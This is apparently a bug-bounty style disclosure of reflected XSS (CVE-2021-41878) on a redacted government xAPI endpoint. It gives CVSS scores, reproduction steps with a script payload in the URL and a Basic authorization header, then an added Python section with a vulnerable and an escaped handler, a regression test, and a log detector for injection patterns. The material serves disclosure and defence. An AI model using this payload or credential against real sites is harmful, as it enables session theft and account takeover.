CVSS3: 6.1 Medium
  Attack Vector: NETWORK
  Attack Complexity: LOW
  Privileges Required: NONE
  User Interaction: REQUIRED
  Scope: CHANGED
  Confidentiality Impact: LOW
  Integrity Impact: LOW
  Availability Impact: NONE
  Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N

CVSS2: 4.3 Medium
  Access Vector: NETWORK
  Access Complexity: MEDIUM
  Authentication: NONE
  Confidentiality Impact: NONE
  Integrity Impact: PARTIAL
  Availability Impact: NONE
  Vector: AV:N/AC:M/Au:N/C:N/I:P/A:N

EPSS: 0.005 Low
  Percentile: 72.2%
Hi team,
I was able to execute XSS on ███████.gov
Steps to reproduce:
1 - Turn on the Burp interceptor.
2 - Go to https://██████.gov/xapi/statements?file"><script>alert(document.domain)</script>
3 - In the interceptor, add the following headers:
Authorization: Basic eGFwaS10b29sczp4YXBpLXRvb2xz
X-Experience-Api-Version: 1.0.1
4 - When you send this GET request, you will receive a response with the XSS payload executed.
An attacker can send the malicious link to victims and steal the victims' cookies, leading to account takeover.
CVE-2021-41878
I have attached the Video POC, please check it out.
Sanitize the inputs in the URL.
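The report boils down to one reflected value: whatever follows `file` in the query string is written back into the HTML response without encoding, so a value containing `"><script>` closes the attribute it lands in and opens a script element. The following is an added example, not code from the report or from the affected product, showing a constructed handler that reproduces that behaviour beside the hardened version (HTML-attribute encoding of the reflected value, which is what the "sanitize the inputs" remediation amounts to), a parser-based check that the fix actually removes the injected element, and a coarse detector for such attempts in web-server access logs. The handler shape, the log lines, the IP addresses and the `Vector`-style regexes are all constructed for illustration; the only value taken from the page is the payload itself.

```python
# Added example: vulnerable reflection vs. encoded reflection of a URL parameter,
# plus a log-side detector. Everything here is constructed for illustration and
# is not the affected product's code.
import re
from html import escape
from html.parser import HTMLParser
from urllib.parse import unquote

# The value the report reflects through the `file` parameter (taken from the page).
REPORT_PAYLOAD = '"><script>alert(document.domain)</script>'


def render_vulnerable(file_param: str) -> str:
    """Constructed handler that writes the raw parameter into an HTML attribute.
    This is the behaviour the report describes: the quote in the input closes
    the attribute and the rest of the value is parsed as markup."""
    return f'<input name="file" value="{file_param}">'


def render_fixed(file_param: str) -> str:
    """Same page, but the value is HTML-attribute-encoded before being emitted.
    escape(..., quote=True) encodes & < > " and ', so the browser sees text, not tags."""
    return f'<input name="file" value="{escape(file_param, quote=True)}">'


class _TagCollector(HTMLParser):
    """Records every start tag the HTML parser sees in a response body."""

    def __init__(self) -> None:
        super().__init__()
        self.tags: list[str] = []

    def handle_starttag(self, tag: str, attrs) -> None:
        self.tags.append(tag)


def script_tags_in(page: str) -> int:
    """Count <script> elements in a response the way a parser (not a substring
    search) would: this is the check a fix should be verified against."""
    collector = _TagCollector()
    collector.feed(page)
    collector.close()
    return collector.tags.count("script")


# Constructed access-log lines in a combined-log-like format; the second one
# carries a URL-encoded copy of the report's payload.
ACCESS_LOG = [
    '10.0.0.5 - - [01/Oct/2021:10:00:00 +0000] "GET /xapi/statements?file=report.csv HTTP/1.1" 200 512',
    '10.0.0.9 - - [01/Oct/2021:10:00:07 +0000] "GET /xapi/statements?file%22%3E%3Cscript%3Ealert(document.domain)%3C/script%3E HTTP/1.1" 200 734',
]

_REQUEST_RE = re.compile(r'"(?:GET|POST) (\S+) HTTP/')
# Coarse heuristic for markup or script landing in a URL; tune to your traffic.
_SUSPICIOUS_RE = re.compile(r"<\s*script|javascript:|on\w+\s*=", re.IGNORECASE)


def flag_reflected_xss_attempts(lines) -> list[str]:
    """Return the decoded request targets that look like script injection attempts.
    The target is percent-decoded twice so a double-encoded payload is not missed."""
    hits = []
    for line in lines:
        match = _REQUEST_RE.search(line)
        if not match:
            continue
        decoded = unquote(unquote(match.group(1)))
        if _SUSPICIOUS_RE.search(decoded):
            hits.append(decoded)
    return hits


if __name__ == "__main__":
    print("vulnerable:", render_vulnerable(REPORT_PAYLOAD))
    print("fixed:     ", render_fixed(REPORT_PAYLOAD))
    print("script tags, vulnerable:", script_tags_in(render_vulnerable(REPORT_PAYLOAD)))
    print("script tags, fixed:     ", script_tags_in(render_fixed(REPORT_PAYLOAD)))
    print("flagged requests:", flag_reflected_xss_attempts(ACCESS_LOG))
```

The encoding must match the context the value is written into: `escape(..., quote=True)` is correct for an HTML attribute or text node, but a value placed inside a `<script>` block or a URL needs JavaScript-string or URL encoding instead, and the parser-based `script_tags_in` check is a better regression test than a substring search because it judges the output the way a browser would.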